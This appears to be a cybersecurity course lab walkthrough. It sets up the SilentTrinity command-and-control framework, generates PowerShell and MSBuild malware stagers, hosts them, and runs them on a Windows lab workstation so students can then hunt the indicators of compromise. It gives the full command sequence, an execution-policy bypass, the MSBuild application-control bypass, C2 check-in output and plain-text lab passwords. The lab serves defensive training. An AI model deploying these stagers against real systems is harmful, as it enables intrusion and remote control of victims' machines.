In this lab, the student will stand up a C2 framework, create a listener for two malware implants, generate stagers, and detonate the payloads. The malware will leave a trail of IoCs that are discover-able in Elastic.
Initiate a Command and Control framework. Create malware and launch the Command and Control malware session on the Windows 10 workstation. Hunt for Indicators of Compromise.
To begin this lab, you will first connect to the Member Server (WS01). Then, you will connect to the Linux server at 10.10.98.20.
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
Upon the first connection to an SSH server, you may get a popup warning to accept the remote server's SSL certificate. Accept the certificate and you will be prompted for credentials as a new window opens. The new window (it will have a black background) is the Putty SSH session. When you close the Putty window, the SSH session is disconnected. During this lab it will be necessary to have multiple SSH sessions Open.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
With the PowerShell window open, run the following command which will launch Putty and initiate a connection to the server at 10.10.98.20. The command instructs putty to open an SSH session on 10.10.98.20 and specify the "itadmin" username.
putty -ssh itadmin@10.10.98.20
As previously discussed, you may receive an alert regarding the SSH server SSL certificate. You will then be prompted for credentials. The password for the "itadmin@10.10.98.20" account is:
APTClass2021!
Working now within the Putty session: Use the following commands to access the SILENTTRINITY directory as root and access the virtual environment:
cd /opt/SilentTrinity
Launch the Silent Trinity Team Server
screen -S ST-teamserver
sudo python3.8 st teamserver --port 81 10.10.98.20 APTClass!
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
SSH to 10.10.98.20 using the PuTTY client installed on the WS01 system. Open a PowerShell and then execute putty using the command line.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
From the powershell window, again connect to the Linux server with putty.
putty -ssh itadmin@10.10.98.20
We will now use the Bash prompts on the SSH server to create a screen session, followed by connecting to the ST server.
A screen session will allow a persistent SSH session.
cd /opt/SilentTrinity
It is the same process to get to this point for both Console Session 1 and Console Session 2 (and the same outcome).
Now, connect to the team-server as a client with the following command:
sudo python3.8 st client wss://itadmin:APTClass\!@10.10.98.20:81
You will now be connected to the Silent Trinity C2 server.
Once the SilentTrinity client as connected, execute the following commands one at a time.
listeners
use https
set port 4444
options
start
There is a now a listener running on TCP port 4444 waiting for connections.
The instructions in this package tell the client to reach out to the command server for the remaining instructions (bits / bytes / malware stage). But there is no stager instruction set yet.
stagers
use powershell
generate https
use msbuild
generate https
Both stagers now reside in the /opt/SilentTrinity/ directory.
The next step of this lab will open a third SSH session, create a new directory to host the malware stagers, move the stagers and host the malware stagers.
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
From the powershell window, again connect to the Linux server with putty.
putty -ssh itadmin@10.10.98.20
Now that the malware stagers have been generated, lets move them into a new folder.
sudo -s
mkdir /opt/web
mv /opt/SilentTrinity/stager.* /opt/web
cd /opt/web
ls
Next, host the malware with python3’s http.server module.
python3 -m http.server
Now that the malware is being hosted on the Linux server, the next steps of the lab will download and execute the malware on the workstation. The malware is now being hosted at http://10.10.98.20:8000.
Now that the SilentTrinity framework is running, we have an attacker client connected, malware generated and served, its time to download the malware and attempt to execute it on the Member Server, WS01.
Connect via Remote Desktop to the Member Server, WS01.
Open Internet Explorer.
Navigate using Internet Explorer’s address bar to http://10.10.98.20:8000 and download both stagers.
http://10.10.98.20:8000
Right (alternate) click both items and choose Save target as... Both items should be saved under the user’s Downloads folder.
A warning may be presented that can be ignored.
After the malware stagers have been downloaded, continue onto the next step of the lab to execute the malware.
Continuing with the Remote Desktop Session on Member Server WS01, we now will execute the downloaded malware.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
In PowerShell, run the following command to execute the malware stager for Silent Trinity.
Set-ExecutionPolicy bypass -Force
Import-Module .\Downloads\stager.ps1
PS C:\Users\itadmin> Set-ExecutionPolicy bypass -Force
PS C:\Users\itadmin> Import-Module .\Downloads\stager.ps1
[*] Found info in embedded resources:
- GUID: 00000000-0000-0000-0000-000000000000
- PSK: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- URLS: ####BEGIN_URLS_SECTION####loremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsum####END_URLS_SECTION####
[+] URLS: https://10.10.98.20:4444
[*] Attempting HTTP POST to https://10.10.98.20:4444/dfde1d15-fb4e-46d9-8063-94d3c4909c98
[-] Attempt #1
[*] Attempting HTTP GET to https://10.10.98.20:4444/dfde1d15-fb4e-46d9-8063-94d3c4909c98
[-] Attempt #1
[*] Downloaded 569104 bytes
[-] 'Boo.Lang.Compiler.dll' was required...
[+] 'Boo.Lang.Compiler.dll' loaded...
[-] 'Boo.Lang.dll' was required...
[+] 'Boo.Lang.dll' loaded...
[*] Compiling Stage Code
[-] 'Boo.Lang.Extensions.dll' was required...
[+] 'Boo.Lang.Extensions.dll' loaded...
[-] 'System.dll' was required...
[+] 'System.dll' loaded...
[-] 'System.Core.dll' was required...
[+] 'System.Core.dll' loaded...
[-] 'System.Web.Extensions.dll' was required...
[+] 'System.Web.Extensions.dll' loaded...
[-] 'Boo.Lang.Parser.dll' was required...
[+] 'Boo.Lang.Parser.dll' loaded...
[-] 'Microsoft.VisualBasic.Devices.dll' was required...
[-] 'Microsoft.VisualBasic.dll' was required...
[+] 'Microsoft.VisualBasic.dll' loaded...
[+] Compilation Successful!
[*] Executing
Jr8d3q6GpM CheckIn
After the malware stager has been executed, continue on to the next phase of the lab.
Under the context of an environment where application control is in effect the MSBuild.exe binary can be useful. While this lab environment does not restrict application execution in this manner, this lab section will demonstrate malware stager executed using Microsoft-Signed MSBuild.
Next, in PowerShell, run the following command to execute the stager for Silent Trinity with the trusted MSBuild binary.
cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
.\MSBuild.exe c:\Users\itadmin\Downloads\stager.xml
(Note if the above fails, try:)
.\MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml
C:\Users\itadmin>
C:\Users\itadmin> cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
c:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml
Microsoft (R) Build Engine version 4.8.3752.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 3/16/2020 6:58:05 PM.
[+] URLS: https://10.10.98.20:4444
[*] Attempting HTTP POST to https://10.10.98.20:4444/521a336b-e199-4bff-a81a-2207f37d79b2
[-] Attempt #1
[*] Attempting HTTP GET to https://10.10.98.20:4444/521a336b-e199-4bff-a81a-2207f37d79b2
[-] Attempt #1
[*] Downloaded 569104 bytes
[-] 'Boo.Lang.Compiler.dll' was required...
[+] 'Boo.Lang.Compiler.dll' loaded...
[-] 'Boo.Lang.dll' was required...
[+] 'Boo.Lang.dll' loaded...
[*] Compiling Stage Code
[-] 'Boo.Lang.Extensions.dll' was required...
[+] 'Boo.Lang.Extensions.dll' loaded...
[-] 'Boo.Lang.Parser.dll' was required...
[+] 'Boo.Lang.Parser.dll' loaded...
[-] 'Microsoft.VisualBasic.Devices.dll' was required...
[+] Compilation Successful!
[*] Executing
z8DiGrOcG3 CheckIn
Having launched both the malware stagers from PowerShell and from MSBuild, the next lab steps will check to ensure that the Command-and-Control malware has checked into the team-server.
After having configured the team-server, configured, built, hosted, and executed the Command and Control malware, the workstation should now have created two command and control sessions to the team-server.
Return to the SSH session that was operating the team-server's client (SSH Session Two). Check the team server's client side for client sessions with the following commands:
sessions
list
[1] ST (stagers)(msbuild) ≫ sessions
[1] ST (sessions) ≫ list
┌Sessions──────────────────────────────┬─────────────────────────────┬──────────────┬──────────────┐
│ Name │ User │ Address │ Last Checkin │
├──────────────────────────────────────┼─────────────────────────────┼──────────────┼──────────────┤
│ 521a336b-e199-4bff-a81a-2207f37d79b2 │ LABS\itadmin@WS10-01 │ 10.10.98.14 │ 00h 00m 01s │
├──────────────────────────────────────┼─────────────────────────────┼──────────────┼──────────────┤
│ 162f4b13-6181-4d7f-988f-4da6c43fc307 │ LABS\itadmin@WS10-01 │ 10.10.98.14 │ 00h 00m 00s │
└──────────────────────────────────────┴─────────────────────────────┴──────────────┴──────────────┘
[1] ST (sessions) ≫
With having built a C2 Framework and connected the Member Server into the framework, lets begin the hunt.
Continue on to L1130-Blue